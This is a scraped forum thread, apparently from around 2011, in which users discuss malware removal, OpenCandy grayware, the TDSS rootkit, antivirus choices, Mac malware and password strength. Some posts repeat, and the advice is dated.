And it's better than 50^40 (assuming all normal ascii characters); it's (32+(26*2)+10)^password length. But as you can see, very long lengths will still get the job done...you just need more characters.
Orca on
0
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
edited May 2011
Longwinded story time!
I've recently had a run in with OpenCandy. For those of you not familiar with OpenCandy, it's essentially a program that is embedded in a variety of popular free downloads. Once you launch the installer, OpenCandy does a scan of your computer, collecting data about your installed programs. Then it displays advertisements in the installer, offering to install other programs at the same time. You have the ability to reject or accept.
The security world has gone back and forth, and back again about the classification of OpenCandy. Some call it spyware, but OpenCandy defends itself as being harmless and completely optional. To my chagrin, I believe that ESET had been tolerating OpenCandy for a long while. They changed their mind recently, and an old copy of Driver Sweeper I had on my hard drive (That's been sitting there for over a year) suddenly came up in past weeks as being malicious - giving my heart a stop until I examined the 'threat' in more detail. ESET have since then gone back on their decision, and OpenCandy is no longer detected by them, which is odd. It played havoc with my backups at the time, and nearly gave me a heart attack.
There's an interesting analysis of OpenCandy on this page. The most pertinent points are:
Now to some readers all this may sound harmless enough but there is more to it:
The recommendations made by OC are partly based on the products you already have installed on your PC. OpenCandy determines this by secretly scanning your PC without ever asking your permission.
While you can elect not to download any of the programs suggested by OC you cannot opt out from installing OC itself; it is fully embedded in the installation process. The situation is made worse by the fact that some software vendors don’t even mention in their End User Licensing Agreement (EULA) that OC is included as part of the installation process for their product.
If you accept any of the software recommendations made by OC then not only will that software be downloaded and installed but OC will also permanently install itself on your PC as well.
Regardless of whether you accept or reject OC’s software recommendations OC will transmit information about your PC back to the OpenCandy Corporation.
Some anti-malware programs including Microsoft Security Essentials flag some products containing OpenCandy as adware.
The makers of OpenCandy have published some credible counter-arguments. They claim:
Many installers from reputable companies scan your PC during the installation process to check for old versions, the existence of essential components and more.
They also claim that OC installs nothing permanently on your computer should you choose not to accept any OC download recommendations.
They state that any data about your PC sent back to OC is the kind of general information collected when you visit a website and contains no personally identifiable information.
Grayware like this is hard to properly classify, and it usually boils down to end-user comfort. For those of you who prefer to keep OpenCandy away from your machine, one thing you can do is to use your HOSTS file to block OpenCandy's call home. To do so, add the following line to your HOSTS file:
127.0.0.1 api.opencandy.com
Additionally, for those curious, please find a short list of some of the software utilizing OpenCandy under the spoiler below. Again, some consider it harmless, others do not - It's up to you to make your decision.
Reboot your system. Once the BIOS POST message clears, mash on F8 until you have the option to load various Windows Safe-Modes. Choose Safe Mode with Networking, and let things load up.
I just wanted to comment on this one. If you're having weird seemingly-untraceable issues, like no malware detected whatsoever, but webpages and searches being redirected anyway, despite a clean hosts file...you might be a victim of a lil rootkit called TDSS (also known as Alureon). It can hide in your MBR, and it can also hide in various drivers. If it manages to hide in your network driver, it will be undetectable, even by TDSSKiller, as long as the network device is active, so in such a case, safe mode with NO networking is the way to go to scan for this particular nasty.
Posts
I've been using the tracking protection for a few weeks now. You need to load the lists into IE. Here's the link: http://iegallery.com/en/trackingprotectionlists/
Simple Ad block was the preferred ad blocker until they started charging for it. I’ve just been using the immunization features from Spybot SD, Spywareblaster, & a couple of tracking protection lists instead of an ad blocker since then. Yeah a few still get through but they don’t bother me that much.
Other than Spybot SD’s host file list I wouldn’t use any of those third parties that just dumps thousands of entries in. That’s actually been shown to slow browsing down because of the time checking and conflicts.
Besides MSE I would recommend Comodo’s free security suit. It does a great job and the av doesn’t conflict with MSE. It also seems to actually do a decent job.
My only complaint is the lack of a spell checker. I'm not a big fan of IE spell and IE7pro was really good but its just not working anymore. Google Tool bar has one as well but I don't want to have to use it.
In other news, there's apparently been a rash of poisoned images floating around on Google Image Search. This vector is being used not only to target people using Windows machines, but is also operating to attack OS X machines (as described on the previous page). The Internet Storm Center has a more thorough breakdown here on their page. Copy and paste of the attack analysis is under the spoiler.
Apparently Google isn't the only site getting hammered with malware lately. Most social networking sites were plagued with clickjacking and redirecting attacks in the wake of the Osama Bin Laden incident. Fraudsters love using hot-topic issues to lure people into their infected pages, and so Facebook and Twitter have been alight with malware, not to mention Search Engine Optimization techniques on most of the major search pages.
Bottom line for most of these attacks: If you're running some sort of script and pluging control with your browser, you're most likely safe. The attacks redirect you to a malicious page where a script attack is launched, so NoScript or a browser whitelist are good protections against such infection attempts.
Second thing is Comodo has a better sandbox that sandboxie and its free in their free security suit. If you're into that kind of security it's really worth looking into.
Protected mode for EI 7 was only built into Vista. On xp (the vast majority of machines), it only moved active x away from being run by explorer into another iexplore thread. It ended up being pretty damn ineffective in both cases. Back then, any browser was better by virtue of not being able to use active x as the majority of attack vectors used it.
To be fair to them, they're handling whatever happened a bit better than Sony did.
Holy crap, thanks for the update. What is with the internet lately? Leaking like a sieve.
I do admire how up front about the entire process that update from LastPass is - from what they noticed to their immediate actions in reply to it. Also, it sounds like they must be using a decent hash, too.
Still, changing the master password might still be a good idea.
No error messages on startup, and Hitman didn't find any additional hazardous files.
I happen to have a UBCD4Win boot disc, and a UBCD boot disc. If I boot from a disc, what do I then do to scan my computer? Go to a site, like Housecall or back to the Hitman site?
First off if you care about security you don't use WinXP. Second IE7 also changed the ability for ActiveX controls to auto run by default. I used to set IE6 & previous versions to do this manually. Now in newer versions ActiveX controls have to be signed to even prompt the user to allow them to run.
I used to go to malicious sites to test brower settings. I would get a good laugh when the pages loaded in Opera and would ask me to run IE or Firefox.
Chrome calls their version of ActiveX Native Code.
Reality very rarely follows what is theoretically best. Vista had a 70%+ rejection rate and many businesses, especially smaller ones, couldn't financially or otherwise technically upgrade. Peripheral compatibility for consumers was a joke up until SP1 and was non existent for businesses. The software situation was much worse as much of the underpinnings were changed, it forced people to either stick with xp or upgrade their software. In some situations it was impossible as the vendors didn't even release compatible versions. Certainly, there were workarounds in many cases but most were financially untenable.
As for ie7, there were flaws that allowed the new security features to be completely bypassed (iirc within the first two weeks of the official release). I can't think of a single machine I had to clean that didn't have install activex bar disabled. It quickly became irrelevant anyway as we moved towards the situation we are in now where the majority of attacks are in combination - ie: using js and an iframe to load a pdf, flash or jar file (sometimes all three) in order to gain entry to the system. A security warning for loading controls does no good when those already installed are vulnerable, regardless of the browser running them.
There should be a number of tools already on the UBCD, I believe, for scanning. Hopefully you'll boot into a network aware capacity, and be able to update them. Alternatively, you can scan with something you've downloaded, like MBAM or Hitman again.
The other alternative is to use a rootkit scanner, something like rootkit revealer, f-secure blacklight, Sophos Anti-rootkit, or the mighty GMER. However, use caution when acting on information from these anti-rootkit tools. They are powerful, but their output can be hard to decode. Rather than just saying "Hey! Here's a rootkit!" they typically display files, hooks, and processes that show rootkit like behavior. For example, both Daemon tools and SecuROM DRM set off rootkit revealer, and 'removing' either of them will render them inoperative. So it's possible you can damage a legitimate file/proces if you're too hasty, and it's always best to investigate further when you get positives from any of these tools. Typically it's best to Google the results flagged as suspicious, or get the advice of experts.
CHANGE PLACES!
It will be because everyone has abandoned that piece of junk platform.
Quite agreed. I'm wondering if HTML5 is going to be much more secure than flash, personally.
In other news: It looks like another case of server-side hacking has occurred, this time on the Eidos and Human Revolution websites. Joystiq has a more complete story. Looks like mostly email addresses were stolen, though apparently up to 350 job applications were also pinched. Seems pretty minor compared to some other leaks lately (not much personal data was collected for regular users, no passwords or secret questions - just emails addresses), but it's still worrisome that the server-side aspect of out web-experience is the juicy (and vulnerable) target these days.
And here's the full statement issued by Square-Enix in reply to this:
Late Edit: Sorry to pile on the thread, but I just read this over at Wilders, and it rather disturbed me. Apparently the source code for the notorious Zeus banking trojan has been released to the masses as freeware. The trojan used to be available only for purchase in certain underground rings, but now it's apparently easy to grab for no money at all. Softpedia has a more complete story here.
Not enough
I'm guessing WSE and Avast get recommended so ofter because they're free. But if Norton is also free, how does it compare to those two?
Historically, Norton is a piece of shit. It used to be extremely bloated, and didn't offer good protection. I've not used it in almost a decade at this point, but from what I understand the latest offerings have really changed, and Symantec are trying hard to make the software much better. I have heard surprisingly good reviews about Norton 360, but I unfortunately have no firsthand experience with it.
When it comes to efficacy, it's extremely difficult to tell you which suite is going to be best. MSE and Avast do come with high recommendations - not only because they are free, but because they do perform well in tests. Norton Security Suite, I believe, is essentially Norton 360 with some other applications bundled in. If it's running on the same core as Symantec's corporate antivirus, then Antivirus Comparatives ranked them fairly competitively last year - though they didn't do well in the proactive scanning (i.e. detecting unknown threats).
In the end, finding any of those three choices will do well for you. None of them are going to give you 100% protection, so ensure you're using other defensive measures (sandboxing and/or rights dropping), particularly for your browser (Some form of script controlling and flash blocking is highly recommended). Usually it's all going to boil down to which of the three antivirus suites runs smoothest and has the best interface for you. Sometimes people complain about bloat with Avast, and I've even seen some issues with MSE being resource-intensive. Others see no such thing. This all seems to be very case-by-case. Essentially, figuring out which offering is most compatible with your system and habits is going to be the best deciding factor - When it comes to protection, it's almost impossible to give a good analysis, since each of the three options will catch and/or miss threats the other two miss/catch.
Sorry to not give a more clear-cut answer, but in my experience there's really no "best" antivirus out there. If we were talking two or three years ago, I'd tell you to avoid Norton like the plague, but they've been working hard to turn it around.
The setup executable is creating new .exes in my Temp folder. I can watch it create a new .exe.
HELP.
Edit:
Windows Vista, all up to date, and running AVG up to date.
Have them run a full scan on the system. Since both are free I use both and suggest this to others.
After running Malwarebytes, I'd run a secondary scan with AVG, or some other antivirus, as well.
I admit I don't have experience with Linux when it comes to running AV, but here are some of the options I've heard of:
Happy birthday, thread.
Oh wait no it is actually older. Happy belated birthday, thread.
But anyhow, thanks all the help everyone's been doling out, as well as the conversation and input. What a weird year it's been, too, from Stuxnet to the PSN hack. Here's to staying safe for another year.
Oh, and malware can still go die in a fire.
Also, Apple doesn't really want to help you.
And all you have to do to get infected is stumble apon a page serving it, accept the offer to "clean your machine", download the zip, if it doesn't automatically extract, extract it, double click the package, click through several install screens and give it an administrator's username and password.
It's actually easier to remove than it is to become infected.
So long as you're not a complete silly goose, you can still be smug and elitist.
I'm going to soapbox a bit here (And keep in mind that this is coming from someone who uses both platforms, and spends an increasing amount of time on OS X): 'Out of the box' OS X and Apple products are more secure than their Windows counterparts. This has nothing to do with software design on a fundamental level, but rather with decisions to keep legacy support in newer versions of Windows. OS X has always respected the principle of least privilege, but Windows can't do that without borking a shitload of software, so they avoid it. So, granted, point in Apple's favor.
But who cares? In my opinion it is actually easier to make a Windows machine more secure than an OS X machine. This is because people recognize there are security issues to be dealt with, and software is available to handle those issues - Usually for free! Instead, Apple and OS X users decide that they're fucking invincible, and how dare you imply otherwise.
Make no mistake, the largest security threat against the Apple brand at the moment is hubris. They have cultivated an image for their platform which invokes the idea that nothing bad can ever happen to the end user. Which is precisely why their end users are more likely to fall victim to social engineering attacks. What good is the principle of least privilege if your user is so confident in his/her inability to get infected that they download, install, and input passwords without thinking? Or run Safari with 'Execute Trusted Files on Download' activated?
The prevailing attitude in the community, particularly on the Apple forums, is "You'll never get infected... Unless you're a moron!" The blame for infection is always heaped on the user, never on the software or the brand that perpetuates a juicy hotbed of social engineering tactics. And then, let's not start about the semantic arguments. Yes, I know there are no know viruses for OS X. Viruses also constitute a small and shrinking portion of PC malware. Besides that, OS X still has plenty of trojans, backdoors, and other malware - But I guess those aren't 'real' threats? Almost every fake AV attack is a trojan these days.
In the end, any software and any platform is as secure as you want it to be, and as secure as you make it. But the idea that OS X cultivates an image of "You don't need to make this secure"! Means that they train their users to be the silliest, most smug geese on the planet. Since OS X has been proven vulnerable at pwn2own several years running, I'd assume that now that sights have been leveled at the Apple brand, there's going to be some nasty developments in the future. Here's to hoping that Apple takes a more security conscious approach to user treatment in the future, rather than sweeping shit under the run.
And that was too much soap boxing. My apologies. I just wanted to get that out of my system for a few days, ever since reading through the Apple forums.
Because if I were to call up Microsoft for help with a malware infection they'd be so helpful, too. Oh, wait, no, they'll just suggest getting an antivirus. Which is exactly what Apple is doing (and should do).
Yes, this is more or less what I would have said if I hadn't felt like being snarky and lazy.
How's the state of MacOS antivirus nowadays? I hope it's not as dire as the Linux side. ClamAV can go eat a dick or five.
There are actual decent options available. Intego's Virus Barrier is supposed to be pretty good. Additionally, ESET have released their NOD Client for OS X. Believe it or not, there's also a free option, with Sophos Antivirus. Personally, I've been using NOD, but that's because I'm an ESET fanboy, and they've saved my bacon a few times in the past. I will note that most antivirus options on OS X suffer from a bit more system drag than the Windows counterparts, though. I attribute this to the kinks still being worked out. (And yes, ClamAV is awful, awful, awful)
Also... Okay, I swear I'm not trying to stir the pot here. After a few hours, I realized my above post probably came off as spiteful and vindictive, and I'm not trying to be petty. I like OS X, just as I like Windows 7, it's just that I don't like it when companies mislead their customers. So please forgive me if I flew off the handle.
That being said, Apple's response to the growing malware attacks (in the form of an internal memo) can be seen in this latest article. While I can understand that Apple doesn't want to be involved in recommending anti-malware software, I find it strange that the official policy is to not help people remove the malware - Mostly because it's been said time and time again that this malware is easy to remove. I suppose they have reasons for keeping the issue at an arms length, but I'm uncertain what it might be. I have to admit, I'm rather rubbed the wrong way by the bullet points at the end of the memo:
There's no reason to go to Tier 2 because there's nothing more to do: regular ol' tech support can suggest a few antivirus programs as easily as Tier 2 could, and contacting them is just wasting everyone's time. Likewise, the stores can't do anything for the same reasons AppleCare can't/doesn't. One thing that does baffle me, though, is the "do not confirm/deny" point. It's kind of obvious once you've installed MacDefender, after all...
Once again, this isn't anything new. Call up Microsoft sometime and ask them how to remove malware. They'll tell you the same thing: get an antivirus. Why Apple is singled out for this behavior is beyond me.
That said, I hope Apple updates the built in quasi-AV in Snow Leopard to take care of this thing. There's a precedent for it. And nothing it covers has gotten nearly as much press or spread as far as MacDefender has.
First, the memo is unclear as to whether or not Apple will actually recommend installing antivirus. They do indicate telling afflicted users to visit the Apple Store, but they're also instructed specifically not to indicate that a problem exists (that first bullet point). Microsoft has a policy for security issues, quoted in that linked article above:
The spoilered portion of that quote has recommendations and instructions to install and run antivirus before contacting support. The KB article from Microsoft in that quote also has a fairly nice rundown of what Viruses, Spyware, and Malware are. As well as a section specifically detailing the steps necessary to remove rouges, and reset your Proxy settings in case malware trashed it. Microsoft also release, every month, a malicious software removal tool that installs via automatic updates, and they provide a competitive antivirus solution for free.
Will their recommendation be 'Install an antivirus' if you call them up? Probably so, if you haven't already, but the information provided seems to indicate they'll also go through the pains to help you clear the infection. They'll certainly acknowledge the infection is a problem. They have a 24 hour support line specifically for this issue, and recommend that you install antivirus before calling it, so I'd assume they'll help you through to the end. This seems to contrast the Apple mentality. To be fair, history has necessitated this on the Microsoft end of things.
Second, don't get me started about that quasi-AV for Snow Leopard. It's a joke, plain and simple - unless, as you say, they update it at some point. It was lip service paid to the consumer at the launch of Snow Leopard to combat the two trojans in the wild at the time, and I assume that it became utterly useless within a week of Snow Leopard's release when the trojans were altered as they always are.
The reason I'm heaping on Apple here is because these attitudes just feed into the negative problems that are causing the issue to begin with. By refusing to acknowledge that a problem exists, they continue to perpetuate the image that nothing can go wrong with OS X. The reason people are falling for this MacDefender stuff is poor knowledge, which makes them a ripe social engineering target. If Apple were to be a bit more forthright about this, they could dampen the impact considerably.
I'm not trying to start a vicious argument here, so forgive me if I come off a bit snippy. OS X remains more secure than Windows in light of the current threat landscape, and I'm not trying to contest that fact. I also agree that there are some good reasons not to want to have call centers flooded with this issue, and that there's not much to be done on the tech's end of things. The official Apple word could just be a bit more sensitive to the customer who's plagued by this, and the 'head in the sand' approach to verifying the problem just sort of gets under my skin. Security starts with the user, and educating the user is more valuable than taking a silent approach.
Edit: Gadzooks, I talk too much. Apologies for piling on again.
If they'd suggest getting MSE, you'd already be one step ahead from it.
I've called, of all people, Zune tech support, and once they thought a problem I had might have been due to something that could be corrected by Malwarebyte. Yup, the one. I already had it, so that was a dead end. But I was a bit impressed that they'd suggest it. It was more than a year ago, perhaps, but they basically sent me a link to somewhere they'd hosted the client installer.
A 40 digit number would be weaker than the corresponding length password containing characters and symbols, but to be honest I'm not sure how the security would stack up against attacks. Realistically, though, I think it'd be a larger question of practicality rather than security. First, you're going to need to know if the service/software you're using the password for is going to (A) accept only numeric digits (many require alphanumeric at least, if not demanding special characters, too), and (B) have limits on password length.
Overall, anything that's going to let you use 40 digits in a row would probably also allow you to use a passphrase, instead of a password. And it'd probably be easier to remember a passphrase with some numbers sprinkled in, rather than a password that's 40 digits long with a word in there somewhere.
I'm no cryptography expert, so that's just my $0.02. I know we've got some other, more skilled people on the board who can provide a more detailed answer than I can, though!
Second, you're looking at 10^40 possible passwords by using just 40 digits. Very good, actually. Much better than most passwords unless they're getting to an obscene length. A password with a mix of numbers, mixed case letters, and symbols needs 20-21 characters to get similar complexity, which is already beyond what most people will memorize. Your not-so-average 10 character password with letters, numbers, and symbols is only looking at 10^19 possible passwords; 21 orders of magnitude less.
So if you can remember that sort of monolithic password, and if you only use it for one thing (avoid password reuse if you can), and if the place you want to use it in allows it, yeah, it's a good idea.
And it's better than 50^40 (assuming all normal ascii characters); it's (32+(26*2)+10)^password length. But as you can see, very long lengths will still get the job done...you just need more characters.
I've recently had a run in with OpenCandy. For those of you not familiar with OpenCandy, it's essentially a program that is embedded in a variety of popular free downloads. Once you launch the installer, OpenCandy does a scan of your computer, collecting data about your installed programs. Then it displays advertisements in the installer, offering to install other programs at the same time. You have the ability to reject or accept.
The security world has gone back and forth, and back again about the classification of OpenCandy. Some call it spyware, but OpenCandy defends itself as being harmless and completely optional. To my chagrin, I believe that ESET had been tolerating OpenCandy for a long while. They changed their mind recently, and an old copy of Driver Sweeper I had on my hard drive (That's been sitting there for over a year) suddenly came up in past weeks as being malicious - giving my heart a stop until I examined the 'threat' in more detail. ESET have since then gone back on their decision, and OpenCandy is no longer detected by them, which is odd. It played havoc with my backups at the time, and nearly gave me a heart attack.
There's an interesting analysis of OpenCandy on this page. The most pertinent points are:
Grayware like this is hard to properly classify, and it usually boils down to end-user comfort. For those of you who prefer to keep OpenCandy away from your machine, one thing you can do is to use your HOSTS file to block OpenCandy's call home. To do so, add the following line to your HOSTS file:
Additionally, for those curious, please find a short list of some of the software utilizing OpenCandy under the spoiler below. Again, some consider it harmless, others do not - It's up to you to make your decision.
I just wanted to comment on this one. If you're having weird seemingly-untraceable issues, like no malware detected whatsoever, but webpages and searches being redirected anyway, despite a clean hosts file...you might be a victim of a lil rootkit called TDSS (also known as Alureon). It can hide in your MBR, and it can also hide in various drivers. If it manages to hide in your network driver, it will be undetectable, even by TDSSKiller, as long as the network device is active, so in such a case, safe mode with NO networking is the way to go to scan for this particular nasty.
http://support.kaspersky.com/viruses/solutions?qid=208280684